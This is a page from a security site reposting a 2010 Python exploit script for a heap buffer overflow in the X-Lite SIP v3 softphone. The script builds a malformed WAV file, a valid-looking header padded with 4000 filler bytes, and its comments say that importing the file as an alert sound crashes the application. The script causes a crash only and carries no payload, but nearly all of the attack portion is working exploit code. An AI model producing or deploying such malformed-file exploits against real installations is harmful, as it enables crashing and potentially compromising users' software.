首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
X-lite SIP v3 (wav) memory corruption Heap BOF exploit
来源:vfocus.net 作者:TecR0c 发布时间:2010-02-08  

#!/usr/bin/python
#
# ####################################################################
#
# X-lite SIP v3 (wav) memory corruption Heap BOF exploit
# Date: 06-02-2010
# Author: TecR0c
# Software Link: http://xlite.counterpath.com/download/win32_100106
# Version: 3.0
# Tested on:  Windows XP SP3
# Usage: right click running application > options > Alerts & sounds > import --> boom!
#
######################################################################

header = ("\x52\x49\x46\x46\xe4\x0a\x09\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
"\x10\x00\x00\x00\x01\x00\x02\x00\x44\xac\x00\x00\x10\xb1\x02\x00"
"\x04\x00\x10\x00\x64\x61\x74\x61\xc0\x0a\x09\x00\x01\x00\x01\x00"
"\x00\x00\x01\x00\x01\x00\x04\x00\x00\x00\x05\x00\x02\x00\x08\x00"
"\x02\x00\x09\x00\x01\x00\x0a")

exploit = header
exploit += "\x41" * 4000

try:
 print "[+] Creating exploit file.."
 crash = open('TecR0c-wins.wav','w');
 crash.write(exploit);
 crash.close();
except:
 print "[-] Error: You do not have correct permissions.."


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FoxPlayer 1.7.0 (.m3u) Local B
·httpdx v1.5.2 Remote Pre-Authe
·Opera 10.10 Remote Code Execut
·Safari v4.0.4, Firefox v3.5.6,
·Ipswitch IMAIL 11.01 reversibl
·Solaris/Open Solaris UCODE_GET
·Signed Applet Social Engineeri
·'Wireshark LWRES Dissector get
·Audiotran 1.4.1 (PLS File) Sta
·AstonSoft DeepBurner (DBR File
·GNOME Nautilus code execution
·Novell iPrint Client ActiveX C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved